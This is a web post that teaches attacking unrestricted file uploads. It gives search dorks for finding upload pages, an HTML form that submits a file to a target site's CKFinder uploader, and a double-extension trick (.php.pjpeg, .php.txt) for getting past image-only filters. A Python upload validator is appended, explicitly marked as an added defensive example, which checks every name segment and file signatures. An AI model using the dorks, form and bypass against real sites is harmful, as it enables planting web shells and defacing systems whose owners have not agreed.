Dork: File Upload Vulnerability

Ingredients

– Dork

* upload.html

* Upload.htm

* Upload.php

* Upload.phtml

* Uploads.html

* Uploads.php 

<html>
<head>
    <title>./75n1</title>
</head>
<body>
<center>
<p style="font-weight:bold">Ustazah</p>
<img src="http://i.imgur.com/fl2HqAw.jpg" alt="gambar" class="bg" />
<br><br>
<form method="POST" action="http://target.com.net/admin/app/webroot/plugin/ckeditor/ckfinder/ckfinder.html"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button> Bantai !!!</button>
</form></center>
</body>
</html>

copy.html 

if you don't have one yet

Ingredients for putting together a dork:

Filename :

– upload

– uploader

– uploadfile

– upload_file

– uploadform

– upload_form

– formupload

– form_upload

– fileupload

– file_upload

– fileuploader

– file_uploader

* Add more if you know any

File extension :

– .htm

– .html

– .php

– .phtml

– .asp

– .aspx

– .cgi

* Add more if you know any

Access folder :

– /upload

– /uploads

– /file

– /files

* Add more if you know any

Note:
If you come across an uploader that only accepts JPEG or TXT, don't skip it;
it can usually be bypassed: .php.pjpeg, .php.txt
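
Seen from the server side, the bypass in the note works when an upload filter looks only at the final extension. The following is an added example, not part of the original post: a Python check that inspects every dot-separated segment of the name, verifies image signatures, and stores the file under a random name. The extension sets and the function name `stored_name` are assumptions of this example.

```python
import os
import re
import secrets

# Constructed policy for this example: what the application accepts, and
# extensions a web server may execute or interpret (the page's list plus
# common PHP variants).
ALLOWED = {"jpg", "jpeg", "png", "gif", "txt"}
SERVER_SIDE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
               "asp", "aspx", "cgi", "pl", "jsp", "htm", "html", "shtml"}
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def stored_name(client_name: str, head: bytes) -> str:
    """Validate an uploaded file and return the name to store it under.

    Raises ValueError on rejection. `head` is the first bytes of the content.
    """
    # Drop any path the client sent; some clients send a full path.
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base or re.search(r"[\x00-\x1f]", base):
        raise ValueError("empty name or control character in name")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError("no extension, or dotfile such as .htaccess")
    ext = parts[-1].strip()
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext!r}")
    # Apache mod_mime can act on ANY extension in the name, so shell.php.txt
    # may still reach the PHP handler. Inspect every segment, not just the last.
    inner = {p.strip() for p in parts[1:-1]}
    if inner & SERVER_SIDE:
        raise ValueError("server-side extension hidden before the final one")
    # For image types, the content must start with the matching signature.
    if ext in MAGIC and not head.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    # Store under a random name: no client-chosen segment survives.
    return f"{secrets.token_hex(16)}.{ext}"
```

Serving the upload directory with script execution disabled and outside the paths listed under "Access folder" remains necessary; the name check alone does not cover handler misconfiguration.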
